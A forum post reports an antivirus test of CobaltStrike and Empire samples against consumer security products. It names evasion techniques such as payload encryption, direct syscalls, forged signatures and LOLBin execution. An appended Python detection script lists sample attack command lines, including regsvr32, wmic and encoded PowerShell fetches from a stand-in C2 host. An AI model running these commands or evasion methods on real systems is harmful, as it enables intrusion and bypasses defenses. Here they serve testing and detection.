Turtle‘s Enhanced Realworld Tests (updated)
<blockquote data-quote="ShenguiTurmi" data-source="post: 1045049" data-attributes="member: 99409"><p>Previous Tests:</p><p>EP1&2 are not released here</p><p>EP3: <a href="https://malwaretips.com/threads/turtle%E2%80%98s-enhanced-realworld-test-updated.126546/post-1026903" target="_blank">45AVs VS CobaltStrike</a></p><p></p><p>Test result (√ means protection success, × means protection failure):</p><p>[ATTACH=full]276248[/ATTACH]</p><p></p><p>Test screenshots:</p><p>[URL unfurl="true"]https://ln5.sync.com/dl/0f7cf20a0/view/default/9160484270000#ivh45d3i-fd3zjvdn-3izds4wh-f7bc84zz[/URL]</p><p></p><p>Three years ago, in the first issue, we tested the effectiveness of the Empire framework against personal security software (not released here), and six months ago we tested the effectiveness of the CobaltStrike framework against personal security software (EP3).</p><p>Recently, I learned that many red teams do not rely heavily on these open-source loaders but have some pre-configured commercial solutions, and I decided to give it a try.</p><p>It just so happens that a commercial AV bypass tool author was willing to sponsor me for this test, and I thank him for the bypass tool.</p><p>At the same time, a team took over Empire, which had stopped updating, and I decided to add the new version of Empire to the test to see whether any security software had done a better job of defending against it after the previous test.</p><p>As an experimental group, we used almost all the personal security software on the market and kept the defaults completely.</p><p></p><p>Our test does the following:</p><p>1. Download the payload to the local machine</p><p>2. Start the payload (may have a loader)</p><p>3. The sample establishes a C2 connection (the target server is a public cloud server)</p><p>4. The target machine comes online</p><p>5. Screenshot of the command issued by C2</p><p>6. C2 sends a command to obtain a txt file from the C drive (simulated data theft)</p><p>If the security software blocks at any step of this process in any way (including static scanning / HEUR / firewall blocking C&C, etc.), the defense is considered successful; only if there is still no action after all steps have been executed is it considered a failure.</p><p></p><p>We prepared 10 samples for this test, divided into Scenario-A (CobaltStrike) and Scenario-B (Empire):</p><p>Scenario-A sample 1: Based on CobaltStrike, using an XOR-encrypted payload, using direct syscalls to replace the original dependencies, packaged as a .Net executable file.</p><p>Scenario-A sample 2: Based on CobaltStrike, using HEX to obfuscate the payload, using direct syscalls to replace the original dependencies, with a fake digital signature, packaged as a .Net executable file.</p><p>Scenario-A sample 3: CobaltStrike based, AES-encrypted payload, ConfuserEX obfuscated, packaged as a .Net executable file.</p><p>Scenario-A sample 4: CobaltStrike based, XOR-encrypted payload with a forged digital signature, compiled into an executable using LLVM.</p><p>Scenario-A sample 5: CobaltStrike based, using an XOR-encrypted payload, using Shikata-Ga-Nai obfuscation, compiled into an executable using LLVM.</p><p>Scenario-B sample 1: Based on Empire, simulating Ducky/Teensy BadUSB, using keystrokes to execute a Powershell payload, no binary landing.</p><p>Scenario-B sample 2: Based on Empire, packaged as an XSL file and executed by wmic with a Powershell payload, no binary landing.</p><p>Scenario-B sample 3: Based on Empire, packaged as an SCT script, Powershell payload executed by regsvr32, no binary landing.</p><p>Scenario-B sample 4: Based on Empire, packaged as a VBS script, Powershell payload executed by scripthost, no binary landing.</p><p>Scenario-B sample 5: Based on Empire, packaged as an XML file, Powershell payload executed by msbuild, no binary landing.</p></blockquote><p></p>
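The five Scenario-B samples all rely on built-in Windows binaries running script payloads, so a defender's first check is process-creation telemetry. The following detection logic is an added example, not code from the post or its author; the event records, rule names and regular expressions are constructed here and are not the tester's.

```python
import re

# Constructed process-creation events (image, command line); not from the post.
# Hosts use the reserved .invalid TLD so nothing here resolves.
SAMPLE_EVENTS = [
    ("regsvr32.exe", "regsvr32.exe /s /u /i:http://c2.invalid/p.sct scrobj.dll"),
    ("wmic.exe", 'wmic.exe os get /format:"http://c2.invalid/stage.xsl"'),
    ("wscript.exe", "wscript.exe C:\\Users\\u\\Downloads\\invoice.vbs"),
    ("msbuild.exe", "msbuild.exe C:\\Users\\u\\AppData\\Local\\Temp\\build.xml"),
    ("powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ("msbuild.exe", "msbuild.exe C:\\src\\app\\app.csproj"),   # benign build
    ("notepad.exe", "notepad.exe C:\\Users\\u\\notes.txt"),     # benign
]

# (rule name, image regex, command-line regex); all matched case-insensitively.
RULES = [
    # Scenario-B sample 3: SCT scriptlet loaded through regsvr32
    ("regsvr32_scriptlet", r"regsvr32", r"(/i:|scrobj\.dll|\.sct\b)"),
    # Scenario-B sample 2: remote or local XSL stylesheet run by wmic
    ("wmic_xsl", r"wmic", r"/format:.*(https?:|\.xsl\b)"),
    # Scenario-B sample 4: VBS launched by Windows Script Host from a user path
    ("wsh_vbs", r"[wc]script", r"(users|temp|downloads).*\.vbs\b"),
    # Scenario-B sample 5: MSBuild given a bare .xml project instead of .csproj
    ("msbuild_xml", r"msbuild", r"\.xml\b"),
    # Scenario-B sample 1: typed BadUSB payloads land as hidden/encoded PowerShell
    ("ps_hidden_encoded", r"powershell",
     r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)"),
]

def classify(image, cmdline):
    """Return the names of every rule this event matches; [] means no alert."""
    return [name for name, img_re, cmd_re in RULES
            if re.search(img_re, image, re.I) and re.search(cmd_re, cmdline, re.I)]

def scan(events):
    """Map each command line to the rule names it triggered."""
    return {cmd: classify(img, cmd) for img, cmd in events}

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS).items():
        print("ALERT" if hits else "ok   ", hits, cmd)
```

In the test's own terms, a hit on any of these rules before step 3 completes counts as a block, which is exactly the "no binary landing" gap the Scenario-B samples probe.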